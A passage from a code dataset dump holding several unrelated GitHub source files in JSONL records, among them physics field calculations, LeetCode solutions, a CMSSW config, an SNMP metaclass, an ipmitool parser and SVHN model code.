cable under consideration\n Second and third columns - Abscissa and ordinate of the n-th cable under consideration\n subparser_type : str\n Parsed argument, indicating the subparser called in the command line.\n lim_val : list of float\n MicroTesla value at which is estimated the DPA (distanza di prima approssimazione)\n\n Returns\n -------------------\n dpa_value : float\n Value of the estimated DPA (distanza di prima approssimazione) at the given limit value\n '''\n xg, yg = centroid(cables_array, subparser_type)\n delta, nx = is_underground(cables_array, subparser_type)\n\n x = np.linspace(xg-delta, xg+delta, nx)\n y = yg\n z_array = np.zeros(nx)\n for i in range(nx):\n z_array[i] = main_point(current_s, x[i], y, diam_cables, cables_array, subparser_type)\n\n dpa_value = lim_val_checker(xg, x, nx, z_array, lim_val)\n return dpa_value\n\n\ndef main_print_point_bidim_dpa(current_s, xp, yp, diam_cables, cables_array, args, file=None):\n '''\n Utility function that groups the calls to 'point', 'bidim' and 'dpa' CL optional arguments and prints the respective output.\n\n Print's 'file' keyword argument is made explicit so that it can be replaced with the selected destination file\n in case the \"save\" CL optional argument is invoked.\n\n Parameters\n -------------------\n current_s : numpy.ndarray\n Current (A) circulating inside the considered power line/lines\n (each one composed of a triad of cables)\n xp, yp : float\n Abscissa (m) and ordinate (m) of the point of interest where\n the magnetic induction field B will be calculated at last\n diam_cables : float\n Diameter (m) of the cables in use\n cable_array : numpy array\n First column - Current phase belonging to the n-th cable under consideration\n Second and third columns - Abscissa and ordinate of the n-th cable under consideration\n args : argparse.Namespace\n Namespace object build up from attributes parsed out of the command line\n file : opened file, default=None\n Destination file of all the print statements\n\n Returns\n -------------------\n None\n '''\n\n if args.point:\n B_point = main_point(current_s, xp, yp, diam_cables, cables_array, args.subparser)\n print('\\nIn point of coordinates (', xp, ',', yp, '), the magnetic induction is ', round(B_point, 2), ' microTesla.\\n', file=file)\n\n if args.bidim:\n B_grid = main_grid(current_s, xp, yp, diam_cables, cables_array, args.subparser)\n print('''\\n------Grid of B field values (microTesla)------\\n----Point of interest in the matrix center-----\\n\\n''', np.flipud(B_grid[2]), file=file)\n # with the flip up down you see the matrix as if it was a xy grid\n\n if args.dpa:\n dpa_value = main_dpa(current_s, diam_cables, cables_array, args.subparser, args.dpa)\n print('\\nThe value of the DPA (Distanza di Prima Approssimazione) is ', round(dpa_value, 1), ' meters from the cables\\' center of gravity abscissa.\\n', file=file)\n","repo_name":"ElenaFusillo/ELFproject","sub_path":"B_field/calculations.py","file_name":"calculations.py","file_ext":"py","file_size_in_byte":16847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"38764415649","text":"# Runtime: 228 ms, faster than 40.25% of Python3 online submissions for Kth Smallest Element in a Sorted Matrix.\n# Memory Usage: 18.8 MB, less than 9.09% of Python3 online submissions for Kth Smallest Element in a Sorted Matrix.\n\nfrom heapq import *\nclass Solution:\n def kthSmallest(self, matrix: List[List[int]], k: int) -> int:\n '''Method 1: use pointer\n Time: O(kn)\n Spce: O(n)'''\n # n = len(matrix)\n # ids = [0] * n\n # min_row = -1\n # while k:\n # ans = (float('inf'), -1)\n # for row in range(n):\n # if ids[row] >= n:\n # continue\n # if (matrix[row][ids[row]], row) < ans:\n # min_row = row\n # ans = (matrix[row][ids[row]], row)\n # # print(min_row, k, ids, ans)\n # ids[min_row] += 1\n # k -= 1\n # return ans[0]\n \n '''Method 2: use min-heap\n Time: O(min(n, k)) heapify + O(klogn) heap pop\n Spce: O(min(n, k))'''\n heap = []\n for row in range(min(k, len(matrix))):\n # matrix[row].reverse()\n # heappush(heap, (matrix[row].pop(), row))\n heappush(heap, (matrix[row][0], row, 0))\n while k:\n num = heappop(heap)\n # if matrix[num[1]]:\n # heappush(heap, (matrix[num[1]].pop(), num[1]))\n if num[2] != len(matrix) - 1:\n heappush(heap, (matrix[num[1]][num[2] + 1], num[1], num[2] + 1))\n k -= 1\n return num[0]","repo_name":"coldmanck/leetcode-python","sub_path":"0378_Kth_Smallest_Element_in_a_Sorted_Matrix.py","file_name":"0378_Kth_Smallest_Element_in_a_Sorted_Matrix.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"50"} +{"seq_id":"40160802840","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"TEST\")\n\n\n# instantiate & configure message logger service\nprocess.MessageLogger = cms.Service(\"MessageLogger\",\n cerr = cms.untracked.PSet(\n enable = cms.untracked.bool(False)\n ),\n cout = cms.untracked.PSet(\n enable = cms.untracked.bool(True),\n threshold = cms.untracked.string('INFO')\n )\n)\n\n\n# define prescale table: three rows (paths), three columns (scenarios)\nprescaleTable = cms.VPSet(\n cms.PSet(\n pathName = cms.string('HLT2'),\n prescales = cms.vuint32(2, 5, 10)\n ), \n cms.PSet(\n pathName = cms.string('HLT3'),\n prescales = cms.vuint32(5, 10, 20)\n ), \n cms.PSet(\n pathName = cms.string('HLT4'),\n prescales = cms.vuint32(10, 20, 0)\n )\n)\n\n\n# instantiate prescale service and configure with above defined table\nprocess.load(\"FWCore.PrescaleService.PrescaleService_cfi\")\nprocess.PrescaleService.prescaleTable = prescaleTable\nprocess.PrescaleService.lvl1Labels = cms.vstring('10E30','10E31','10E32')\nprocess.PrescaleService.lvl1DefaultLabel = cms.string('10E31')\n\n\n# empty source for testing\nprocess.maxEvents = cms.untracked.PSet(input = cms.untracked.int32(100))\nprocess.source = cms.Source(\"EmptySource\")\n\n\n# define modules\nprocess.psHLT1 = cms.EDFilter(\"HLTPrescaler\", \n L1GtReadoutRecordTag = cms.InputTag('source')\n)\n\nprocess.psHLT2 = cms.EDFilter(\"HLTPrescaler\", \n L1GtReadoutRecordTag = cms.InputTag('source')\n)\n\nprocess.psHLT3 = cms.EDFilter(\"HLTPrescaler\", \n L1GtReadoutRecordTag = cms.InputTag('source')\n)\n\nprocess.psHLT4 = cms.EDFilter(\"HLTPrescaler\", \n L1GtReadoutRecordTag = cms.InputTag('source')\n)\n\n\n\n# define paths\nprocess.HLT1 = cms.Path(process.psHLT1)\nprocess.HLT2 = cms.Path(process.psHLT2)\nprocess.HLT3 = cms.Path(process.psHLT3)\nprocess.HLT4 = cms.Path(process.psHLT4)\n","repo_name":"cms-sw/cmssw","sub_path":"FWCore/PrescaleService/test/testPrescaleService_cfg.py","file_name":"testPrescaleService_cfg.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","stars":985,"dataset":"github-code","pt":"50"} +{"seq_id":"15415323333","text":"\"\"\"Variable bindings.\"\"\"\n\nimport inspect\nimport pprint\nfrom collections import defaultdict\nfrom functools import partial, reduce\nfrom operator import attrgetter, methodcaller\nfrom typing import Any, Callable, DefaultDict, Dict, Optional, Sequence, Text, Tuple, cast\n\nimport numpy as np\nimport pandas as pd\nfrom toolz.functoolz import compose\n\nfrom .fp.maybe import Just, Maybe, Nothing\nfrom .utils import concatv_dtypes, convert_oid, dtype_array, dtype_fields, validate_oid\n\nNULL_VAR_BIND_T = Tuple[Sequence[int], Tuple[int, int]] # pylint: disable=invalid-name\n\n\nclass MetaObjectType(type):\n \"\"\"Metaclass for ObjectTypes.\"\"\"\n\n index: Optional[np.dtype] = None\n dtype: Optional[np.dtype] = None\n _parent: Maybe['MetaObjectType'] = Nothing()\n _children: Dict[Text, 'MetaObjectType']\n _oid: Maybe[Text] = Nothing()\n _hooks: DefaultDict[Text, Sequence[Callable[[Any], Any]]]\n\n def __init__(\n cls, class_name: Text, bases: Tuple[type, ...], attrs: Dict[Text, Any]\n ) -> None:\n \"\"\"Initialize ObjectType.\"\"\"\n super().__init__(class_name, bases, attrs)\n Maybe.from_optional(cls.index).fmap(dtype_fields).fmap(methodcaller('throw'))\n Maybe.from_optional(cls.dtype).fmap(dtype_fields).fmap(methodcaller('throw'))\n cls._parent.fmap(methodcaller('_append_child', cls))\n cls._children = {}\n cls._oid.fmap(validate_oid)\n valid_hooks = [\n 'before_view',\n 'after_view',\n 'before_pivot',\n 'before_merge',\n 'after_merge'\n ]\n cls._hooks = defaultdict(list)\n for _, v in inspect.getmembers(cls, predicate=inspect.isfunction):\n _hook = getattr(v, '__hook__', None)\n if _hook is not None:\n if _hook not in valid_hooks:\n raise ValueError(f\"hook '{_hook}' is not a valid hook: {valid_hooks}\")\n cls._hooks[_hook] = [v, *cls._hooks[_hook]]\n\n def _append_child(cls, child: 'MetaObjectType') -> None:\n \"\"\"Append a child ObjectType to this ObjectType.\"\"\"\n cls._children['.'.join([child.__module__, child.__qualname__])] = child\n\n _header_dtype = Just(np.dtype([\n ('#index', np.uint64),\n ('#oid_size', np.uint64),\n ('#result_size', np.uint64),\n ('#result_type', np.uint64),\n ('#timestamp', 'datetime64[s]'),\n ]))\n\n @property\n def _oid_dtype(cls) -> Maybe[np.dtype]:\n \"\"\"Get the oid dtype.\"\"\"\n return (\n cls._oid\n .fmap(convert_oid)\n .fmap(len)\n .bind(partial(dtype_array, np.dtype(np.uint64)))\n .fmap(lambda x: np.dtype([('#oid', x)]))\n )\n\n @property\n def _index(cls) -> Maybe[np.dtype]:\n # pylint: disable=no-member\n \"\"\"Get the index dtype.\"\"\"\n return Maybe.from_optional(cls.index)\n\n @property\n def _dtype(cls) -> Maybe[np.dtype]:\n \"\"\"Get the value dtype.\"\"\"\n return Maybe.from_optional(cls.dtype)\n\n @property\n def _matrix(cls) -> Sequence[Sequence['MetaObjectType']]:\n \"\"\"Expand the tree of ObjectTypes into a matrix of ObjectTypes.\"\"\"\n if not cls._children:\n return [[cls]]\n return [\n [cls, *col]\n for child in cls._children.values()\n for col in child._matrix # pylint: disable=protected-access\n ]\n\n def null_var_binds(\n cls, param: Optional[Text] = None\n ) -> Sequence[NULL_VAR_BIND_T]:\n \"\"\"Get a description of null variable bindings to be filled.\"\"\"\n def _check(null_var_bind: NULL_VAR_BIND_T) -> NULL_VAR_BIND_T:\n for size in null_var_bind[1]:\n if size % 8 != 0:\n raise RuntimeError(f'dtype must be 64bit aligned: {null_var_bind}')\n return null_var_bind\n\n def _node_null_var_binds(_cls: MetaObjectType) -> NULL_VAR_BIND_T:\n # pylint: disable=protected-access, no-member #1127\n return (\n _cls._oid.fmap(convert_oid).from_maybe([]),\n (\n _cls._oid_dtype.fmap(attrgetter('itemsize')).from_maybe(0) +\n _cls._index.fmap(attrgetter('itemsize')).from_maybe(0),\n _cls._dtype.fmap(attrgetter('itemsize')).from_maybe(0)\n )\n )\n\n def _concat_null_var_binds(a: NULL_VAR_BIND_T, b: NULL_VAR_BIND_T) -> NULL_VAR_BIND_T:\n return ([*a[0], *b[0]], (a[1][0] + b[1][0], a[1][1] + b[1][1]))\n\n param_null_var_bind = (\n Maybe.from_optional(param).fmap(convert_oid).from_maybe([]),\n (0, 0)\n )\n\n if cls.dtype is not None:\n if cls._children:\n raise RuntimeError(\n 'ObjectType with a value dtype has children: '\n f'cls={cls.__name__}: dtype={cls.dtype}: children={cls._children}'\n )\n return [_check(_concat_null_var_binds(_node_null_var_binds(cls), param_null_var_bind))]\n\n matrix = cls._matrix\n\n index_set = {\n Maybe.reduce(concatv_dtypes, map(attrgetter('_index'), col))\n for col in matrix # pylint: disable=not-an-iterable\n }\n\n if len(index_set) not in {0, 1}:\n raise RuntimeError(f'ObjectTypes do not share common index: {index_set}')\n\n return [\n _check(reduce(\n _concat_null_var_binds,\n [*map(_node_null_var_binds, col), param_null_var_bind]\n ))\n for col in matrix # pylint: disable=not-an-iterable\n ]\n\n def _view(cls, arr: np.ndarray, col: Sequence['MetaObjectType']) -> Any:\n oid_dtype = (\n dtype_array(\n np.dtype(np.uint64),\n sum(map(len, Maybe.cat(map(\n lambda x: x._oid.fmap(convert_oid), col # pylint: disable=protected-access\n ))))\n )\n .fmap(lambda x: np.dtype([('#oid', x)]))\n )\n index_dtype = Maybe.reduce(concatv_dtypes, map(attrgetter('_index'), col))\n value_dtype = Maybe.reduce(concatv_dtypes, map(attrgetter('_dtype'), col))\n view_dtype = Maybe.reduce(\n concatv_dtypes, [cls._header_dtype, oid_dtype, index_dtype, value_dtype]\n )\n\n arr = reduce(lambda acc, var_bind: cast(\n np.ndarray,\n compose(*var_bind._hooks['before_view'])(acc) # pylint: disable=protected-access\n ), col, arr)\n arr = view_dtype.fmap(arr.view).from_maybe(arr) # type: ignore\n arr = reduce(lambda acc, var_bind: cast(\n np.ndarray,\n compose(*var_bind._hooks['after_view'])(acc) # pylint: disable=protected-access\n ), col, arr)\n\n df = pd.DataFrame.from_records(\n arr.tolist(), columns=arr.dtype.names\n )\n\n # clean up dtypes of empty result\n if arr.size == 0:\n if isinstance(view_dtype, Just) and view_dtype.value.fields is not None:\n for column, dtype in view_dtype.value.fields.items():\n try:\n df[column] = df[column].astype(dtype[0])\n except ValueError:\n df[column] = df[column].astype(object)\n\n df = reduce(lambda acc, var_bind: (\n compose(*var_bind._hooks['before_pivot'])(acc) # pylint: disable=protected-access\n ), col, df)\n\n if df.index.names is not None and [i for i in df.index.names if i is not None]:\n df = df.reset_index().set_index(['#index', *df.index.names])\n else:\n df = df.set_index('#index')\n\n return (\n df.drop(columns={\n '#oid_size', '#result_size', '#result_type', '#oid'\n }.intersection(df.columns))\n )\n\n @staticmethod\n def _pivot(a: Any, b: Any) -> Any: # type: ignore\n \"\"\"Pivot two ObjectType columns into a DataFrame.\"\"\"\n df = pd.merge(a, b, how='outer', left_index=True, right_index=True)\n df['#timestamp'] = (\n df[['#timestamp_x', '#timestamp_y']]\n .max(axis=1)\n .astype('datetime64[s]')\n )\n return df.drop(columns=['#timestamp_x', '#timestamp_y'])\n\n def to_pandas(\n cls, response: Sequence[np.ndarray], data: Optional[Any] = None,\n index: Optional[Sequence[Text]] = None\n ) -> Any:\n # pylint: disable=no-value-for-parameter\n \"\"\"Reduce stuff.\"\"\"\n matrix = cls._matrix\n df = reduce(cls._pivot, [cls._view(arr, col) for arr, col in zip(response, matrix)])\n df['#timestamp'] = df['#timestamp'].dt.tz_localize('UTC')\n df = df.reset_index().set_index('#index')\n df, data = reduce(\n lambda acc, var_bind: cast(\n Tuple[Any, Optional[Any]],\n compose(*var_bind._hooks['before_merge'])(acc) # pylint: disable=protected-access\n ),\n [var_bind for col in matrix for var_bind in col], # pylint: disable=not-an-iterable\n (df, data)\n )\n if data is not None:\n df = df.merge(data, how='outer', left_index=True, right_index=True)\n df = df.reset_index(drop=True)\n if index is not None:\n df = df.set_index(index)\n df = reduce(\n lambda acc, var_bind: (\n compose(*var_bind._hooks['after_merge'])(acc) # pylint: disable=protected-access\n ),\n [var_bind for col in matrix for var_bind in col], # pylint: disable=not-an-iterable\n df\n )\n return df\n\n @property\n def description(cls) -> Text:\n \"\"\"Return string representation.\"\"\"\n pp = pprint.PrettyPrinter(indent=4, width=60)\n\n def dtype_description(\n label: Text, dtype: Maybe[np.dtype], indent: int = 16\n ) -> Sequence[Text]:\n def _dtype_description() -> Sequence[Text]:\n lines = (\n dtype.fmap(dtype_fields)\n .fmap(lambda x: pp.pformat(dict(x.throw())).split('\\n'))\n .from_maybe([])\n )\n return '\\n'.join(lines[:1] + [' ' * indent + line for line in lines[1:]])\n return (\n dtype.fmap(lambda x: [f'{label:{indent}s}{_dtype_description()}'])\n .from_maybe([])\n )\n\n def var_bind_description() -> Sequence[Text]:\n return (\n Maybe.from_optional(cls.__doc__)\n .fmap(lambda x: ['DESCRIPTION'] + [\n f' {line}' for line in x.split('\\n')\n ])\n .from_maybe([])\n )\n\n def parent_description() -> Text:\n return (\n '::= { ' + (\n cls._parent\n .bind(lambda x: Maybe.from_optional(x.__name__))\n .combine(lambda x: lambda y: ' '.join([x, y]), cls._oid)\n .from_maybe('')\n ) + ' }'\n )\n\n def children_sequence_description() -> Sequence[Text]:\n if len(cls._children) > 1:\n return (\n [f'\\n{cls.__name__} ::= SEQUENCE {{'] +\n [f' {child.__name__}' for child in cls._children.values()] +\n ['}']\n )\n return []\n\n def children_description() -> Sequence[Text]:\n return ['\\n'+child.description for child in cls._children.values()]\n\n return '\\n'.join([\n f'{cls.__name__} OBJECT-TYPE', *[\n f' {line}' for line in [\n *dtype_description('BASE_TYPE', cls._dtype),\n *dtype_description('INDEX', cls._index),\n *var_bind_description(),\n parent_description()\n ]\n ],\n *children_sequence_description(),\n *children_description()\n ])\n\n def describe(cls) -> None:\n \"\"\"Print the variable binding description.\"\"\"\n print(cls.description)\n\n\nclass ObjectType(metaclass=MetaObjectType):\n # pylint: disable=too-few-public-methods\n \"\"\"ObjectType definition.\"\"\"\n\n def __attrs_post_init__(self) -> None:\n # pylint: disable=no-self-use\n \"\"\"Raise error if type instance is created.\"\"\"\n raise RuntimeError(\n 'ObjectType is used for type level programming only; instances are not allowed'\n )\n","repo_name":"higherorderfunctor/snmp-fetch","sub_path":"snmp_fetch/object_type.py","file_name":"object_type.py","file_ext":"py","file_size_in_byte":12433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"40055193436","text":"# Time: O(n)\n# Space: O(1)\n\n# Ideas:\n#\n\n\nclass Solution:\n def containsNearbyAlmostDuplicate(self, nums: 'List[int]', k: int, t: int) -> bool:\n if t < 0: return False\n lookup = {}\n for i in range(len(nums)):\n b_idx = nums[i] // (t + 1)\n if b_idx in lookup:\n return True\n if b_idx - 1 in lookup and abs(nums[i] - lookup[b_idx - 1]) < t + 1:\n return True\n if b_idx + 1 in lookup and abs(nums[i] - lookup[b_idx + 1]) < t + 1:\n return True\n lookup[b_idx] = nums[i]\n if i >= k: del lookup[nums[i - k] // (t + 1)]\n return False\n","repo_name":"sevenhe716/LeetCode","sub_path":"Array/q220_contains_duplicate_iii.py","file_name":"q220_contains_duplicate_iii.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"72830977116","text":"import re\n\nfrom .. import Command\nfrom .. sdr import Sdr, AnalogSdr\nfrom pyipmi.tools.responseparser import ResponseParserMixIn\n\nclass SdrListCommand(Command, ResponseParserMixIn):\n \"\"\"Describes the sdr list command\n\n This is not a single IPMI request type - it's an ipmitool\n command that's composed of multiple IPMI requests.\n \"\"\"\n\n name = 'SDR List'\n result_type = Sdr\n\n response_parser = ResponseParserMixIn.parse_colon_record_list\n ipmitool_args = ['-v', 'sdr', 'list', 'all']\n\n def sensor_name_parser(string):\n return string.split('(')[0].strip()\n\n def entity_id_parser(string):\n m = re.search('(\\d.\\d{1,2})', string)\n return m.groups()[0]\n\n def get_response_types(self, record):\n \"\"\"Only matches Analog sensors right now.\n\n There are several more types of records to match, if they\n are needed.\n \"\"\"\n if re.search('Sensor Type \\(Analog\\)', record):\n return AnalogSdr, self.analog_response_fields\n else:\n return None, None\n\n \"\"\"\n Unparsed fields for analog sensors:\n\n Readable Thresholds : lnr lcr lnc unc ucr unr \n Settable Thresholds : lnr lcr lnc unc ucr unr \n Threshold Read Mask : lnr lcr lnc unc ucr unr \n Assertion Events : \n Assertions Enabled : unc+ ucr+ unr+ \n Deassertions Enabled : unc+ ucr+ unr+\n \"\"\"\n analog_response_fields = {\n 'Sensor ID' : {\n 'attr' : 'sensor_name',\n 'parser' : sensor_name_parser\n },\n 'Entity ID' : {\n 'attr' : 'entity_id',\n 'parser' : entity_id_parser\n },\n 'Sensor Type (Analog)' : { 'attr' : 'sensor_type' },\n 'Sensor Reading' : {},\n 'Status' : {},\n 'Nominal Reading' : {},\n 'Normal Minimum' : {},\n 'Normal Maximum' : {},\n 'Upper non-recoverable' : {},\n 'Upper critical' : {},\n 'Upper non-critical' : {},\n 'Lower non-recoverable' : {},\n 'Lower critical' : {},\n 'Lower non-critical' : {},\n 'Positive Hysteresis' : {},\n 'Negative Hysteresis' : {},\n 'Minimum sensor range' : {},\n 'Maximum sensor range' : {},\n 'Event Message Control' : {},\n }\n\nsdr_commands = {\n \"get_sdr_list\" : SdrListCommand\n}\n","repo_name":"Cynerva/pyipmi","sub_path":"pyipmi/commands/sdr.py","file_name":"sdr.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"50"} +{"seq_id":"13988552711","text":"## Author: Luca Pescatore\n## Mail: pluca@cern.ch\n## Description: extends the standards string.format() to handle cases where the key is not present.\n\nimport string\nfrom ROOT import *\n\nclass PartialFormatter(string.Formatter):\n def __init__(self, missing='--', bad_fmt='!!'):\n self.missing, self.bad_fmt=missing, bad_fmt\n\n def get_field(self, field_name, args, kwargs):\n \n try:\n val=super(PartialFormatter, self).get_field(field_name, args, kwargs)\n except (KeyError, AttributeError):\n val=None,field_name \n return val \n\n def format_field(self, value, spec):\n # handle an invalid format\n if value==None: return self.missing\n try:\n return super(PartialFormatter, self).format_field(value, spec)\n except ValueError:\n if self.bad_fmt is not None: return self.bad_fmt \n else: raise\n\n\n\n\ndef divide(num, numE, den, denE) :\n ratio = 0\n ratioE = 0\n \n if (den != 0.) :\n ratio = num / den\n ratioE = ratio * TMath.Sqrt(TMath.Power(numE / num, 2) + TMath.Power(denE / den, 2))\n \n return ratio, ratioE\n\ndef multiply(num, numE, den, denE) :\n prod = 0\n prodE = 0\n \n if (den != 0.) : \n prod = num * den\n prodE = prod * TMath.Sqrt(TMath.Power(numE / num, 2) + TMath.Power(denE / den, 2))\n \n return prod, prodE\n\n\n","repo_name":"lucapescatore88/SciFiTestBeamSimulation","sub_path":"job/utils/formatter.py","file_name":"formatter.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"33215451488","text":"import sys\n\ns = sys.stdin.readline().rstrip()\nwords = []\ncursor = 0\nis_tag = False\ntmp = ''\nwhile cursor < len(s):\n if s[cursor] == '<':\n # 태그 시작\n if tmp:\n tmp = tmp[::-1]\n words.append(tmp)\n tmp = ''\n # 태그가 붙기 전에 단어가 있었다면 단어를 거꾸로 한 뒤 저장\n is_tag = True\n tmp += s[cursor]\n elif s[cursor] == '>':\n is_tag = False\n tmp += s[cursor]\n words.append(tmp)\n tmp = ''\n # 태그 종료. '<_>'까지 입력\n elif is_tag:\n tmp += s[cursor]\n elif not is_tag and s[cursor] != ' ':\n tmp += s[cursor]\n # 태그가 아닌 단어 입력\n elif not is_tag and s[cursor] == ' ':\n tmp = tmp[::-1]\n words.append(tmp)\n words.append(' ')\n tmp = ''\n # 태그가 아닌 단어 입력 완료. 단어는 거꾸로 만들고 저장한다.\n # 공백도 따로 넣어준다.\n cursor += 1\ntmp = tmp[::-1]\nwords.append(tmp)\n# 남아 있는 단어가 있을 때 거꾸로 입력해준다.\nprint(*words, sep='')","repo_name":"PJunyeong/Coding-Test","sub_path":"Baekjoon/17413_단어 뒤집기 2.py","file_name":"17413_단어 뒤집기 2.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"1581788511","text":"# Our API will expose resource (MongoDB collections): 'online'.\n# In order to allow for proper data validation, we define beaviour\n# and structure.\nonline = {\n # 'title' tag used in item links.\n 'item_title': 'online',\n\n # most global settings can be overridden at resource level\n #'resource_methods': ['GET', 'POST', 'PUT'],\n\n # Schema definition, based on Cerberus grammar. Check the Cerberus project\n # (https://github.com/nicolaiarocci/cerberus) for details.\n 'schema': {\n 'users': {\n 'type': 'objectid',\n 'data_relation': {\n 'resource': 'users',\n 'field': '_id',\n 'embeddable': True\n }\n },\n # sha1, plze add salt\n 'token': {\n 'type': 'string',\n 'minlength': 20,\n 'maxlength': 20\n }\n }\n}\n","repo_name":"arvin-chou/mc","sub_path":"module/user/onlineMapping.py","file_name":"onlineMapping.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"18897001013","text":"# SVHN number transcription as in http://arxiv.org/pdf/1312.6082v4.pdf\nimport os\n\nimport numpy as np\n\nimport theano\nimport theano.tensor as T\n\nfrom blocks.bricks.base import application\nfrom blocks.filter import VariableFilter\n\nfrom fuel.transformers import Mapping\nfrom fuel.datasets import H5PYDataset\n\nimport bricks\nimport initialization\n\nimport tasks\nimport masonry\n\nclass SVHN(H5PYDataset):\n def __init__(self, **kwargs):\n kwargs.setdefault('load_in_memory', True)\n super(SVHN, self).__init__(\n os.path.join(os.environ[\"SVHN\"], \"dataset_64_gray.h5\"),\n **kwargs)\n\nclass Emitter(bricks.Initializable):\n def __init__(self, input_dim, n_classes, batch_normalize, **kwargs):\n super(Emitter, self).__init__(**kwargs)\n\n self.input_dim = input_dim\n self.n_classes = n_classes\n\n # TODO: use TensorLinear or some such\n self.emitters = [\n masonry.construct_mlp(\n activations=[None, bricks.Identity()],\n input_dim=input_dim,\n hidden_dims=[input_dim/2, n],\n name=\"mlp_%i\" % i,\n batch_normalize=batch_normalize,\n weights_init=initialization.Orthogonal(),\n biases_init=initialization.Constant(0))\n for i, n in enumerate(self.n_classes)]\n self.softmax = bricks.Softmax()\n\n self.children = self.emitters + [self.softmax]\n\n @application(inputs=['x', 'y'], outputs=['cost'])\n def cost(self, x, y, n_patches):\n max_length = len(self.n_classes) - 1\n _length_masks = theano.shared(\n np.tril(np.ones((max_length, max_length), dtype='int8')),\n name='shared_length_masks')\n lengths = y[:, -1]\n length_masks = _length_masks[lengths]\n\n def compute_yhat(logprobs):\n digits_logprobs = T.stack(*logprobs[:-1]) # (#positions, batch, #classes)\n length_logprobs = logprobs[-1] # (batch, #classes)\n # predict digits independently\n digits_hat = digits_logprobs.argmax(axis=2) # (#positions, batch)\n # likelihood of prediction\n digits_logprob = digits_logprobs.max(axis=2)\n # logprobs of resulting number given length\n number_logprobs = T.extra_ops.cumsum(digits_logprob, axis=0) # (#positions, batch)\n # choose length to minimize length_logprob + number_logprob\n length_hat = (length_logprobs.T + number_logprobs).argmax(axis=0, keepdims=True) # (1, batch)\n yhat = T.concatenate([digits_hat, length_hat], axis=0).T\n return yhat # shape (batch, #positions + 1)\n\n def compute_mean_cross_entropy(y, logprobs):\n return sum(self.softmax.categorical_cross_entropy(y[:, i], logprob)\n # to avoid punishing predictions of nonexistent digits:\n * (length_masks[:, i] if i < max_length else 1)\n for i, logprob in enumerate(logprobs)).mean()\n def compute_error_rate(y, logprobs):\n yhat = compute_yhat(logprobs)\n return T.stack(*[T.neq(y[:, i], yhat[:, i])\n # to avoid punishing predictions of nonexistent digits:\n * (length_masks[:, i] if i < max_length else 1)\n for i, logprob in enumerate(logprobs)]).any(axis=0).mean()\n\n logprobs = [self.softmax.log_probabilities(emitter.apply(x))\n for emitter in self.emitters]\n mean_cross_entropy = compute_mean_cross_entropy(y, logprobs)\n mean_error_rate = compute_error_rate(y, logprobs)\n\n self.add_auxiliary_variable(mean_cross_entropy, name=\"cross_entropy\")\n self.add_auxiliary_variable(error_rate, name=\"error_rate\")\n\n cost = mean_cross_entropy\n return cost\n\nclass NumberTask(tasks.Classification):\n name = \"svhn_number\"\n\n def __init__(self, *args, **kwargs):\n super(NumberTask, self).__init__(*args, **kwargs)\n self.max_length = 5\n self.n_classes = [10,] * self.max_length + [self.max_length]\n self.n_channels = 1\n\n def load_datasets(self):\n return dict(\n train=SVHN(which_sets=[\"train\"]),\n valid=SVHN(which_sets=[\"valid\"]),\n test=SVHN(which_sets=[\"test\"]))\n\n def get_stream_num_examples(self, which_set, monitor):\n if monitor and which_set == \"train\":\n return 10000\n return super(NumberTask, self).get_stream_num_examples(which_set, monitor)\n\n def get_emitter(self, input_dim, batch_normalize, **kwargs):\n return Emitter(input_dim, self.n_classes,\n batch_normalize=batch_normalize)\n\n def monitor_channels(self, graph):\n return [VariableFilter(name=name)(graph.auxiliary_variables)[0]\n for name in \"cross_entropy error_rate\".split()]\n\n def plot_channels(self):\n return [[\"%s_%s\" % (which_set, name) for which_set in self.datasets.keys()]\n for name in \"cross_entropy error_rate\".split()]\n\n def preprocess(self, data):\n x, y = data\n\n x = np.float32(x) / 255.0\n x = x.mean(axis=3, keepdims=True) # grayscale\n # move channel axis forward\n x = np.rollaxis(x, 3, 1)\n\n # crop images randomly\n assert(x.shape[2] == x.shape[3])\n image_size = x.shape[2]\n crop_size = 54\n a = np.random.randint(0, image_size - crop_size, size=(2,))\n b = a + crop_size\n x = x[:, :, a[0]:b[0], a[1]:b[1]]\n\n y = np.array(y, copy=True)\n # use zero to represent zero\n y[y == 10] = 0\n lengths = (y >= 0).sum(axis=1)\n y[y < 0] = 0\n # pretend there are no examples with length > 5 (there are too few to care about)\n lengths = np.clip(lengths, 0, 5)\n # repurpose the last column to store 0-based lenghts\n y[:, -1] = lengths - 1\n\n x_shape = np.tile([x.shape[2:]], (x.shape[0], 1))\n return (x.astype(np.float32),\n x_shape.astype(np.float32),\n y.astype(np.uint8))\n","repo_name":"negar-rostamzadeh/LSTM-Attention","sub_path":"goodfellow_svhn.py","file_name":"goodfellow_svhn.py","file_ext":"py","file_size_in_byte":6095,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"50"} +{"seq_id":"72049660956","text":"import random\n\ndef random_vector (index, dimensions, type) :\n random.seed(index * 3 * 7 * 11 * 3 + 3 * 7 * 2 * 2)\n result = []\n for dimension in range(dimensions) :\n if type in set(['i', 's', 'ui', 'us', 'b', 'ub']):\n result.append(random.randint(-20, 20))\n else:\n result.append(random.randint(-20, 20) + random_mantiss(random, random.randint(2, 4)))\n\n return result\n\ndef random_mantiss (random, size) :\n result = 0\n\n for index in range(size) :\n result += random.randint(0, 1) / (2 ** index)\n\n return 